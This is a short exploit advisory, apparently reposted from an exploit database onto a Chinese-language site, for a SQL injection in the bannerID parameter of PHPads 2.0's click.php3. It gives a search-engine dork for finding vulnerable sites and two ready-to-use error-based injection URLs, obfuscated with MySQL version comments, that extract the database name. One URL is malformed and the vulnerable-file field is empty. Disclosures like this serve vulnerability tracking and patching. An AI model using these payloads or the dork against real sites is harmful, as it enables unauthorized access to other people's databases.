PHPads_2.0_-_’click.php3?bannerID’_SQL注入漏洞

# PHPads 2.0 – ‘click.php3?bannerID’ SQL注入漏洞
==EXP==

[+] Sql Injection on PHPads Version 2.0 based on Pixelledads 1.0 by Nile Flores

[+] Date: 05/05/2019

[+] Risk: High

[+] CWE Number : CWE-89

[+] Author: Felipe Andrian Peixoto

[+] Vendor Homepage: https://blondish.net/

[+] Software Demo : https://github.com/blondishnet/PHPads/blob/master/readme.txt

[+] Contact: felipe_andrian@hotmail.com

[+] Tested on: Windows 7 and Gnu/Linux

[+] Dork: inurl:"click.php3?bannerID="" // use your brain ;)

[+] Exploit : 

        http://host/patch//click.php3?bannerID= [SQL Injection]

[+] Vulnerable File :

	    

[+] PoC : 
 
   http://server/phpads/click.php3?bannerID=-1/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+-
   http:/server/phpAds/click.php3?bannerID=-1/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+-
   
[+] EOF
            
© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容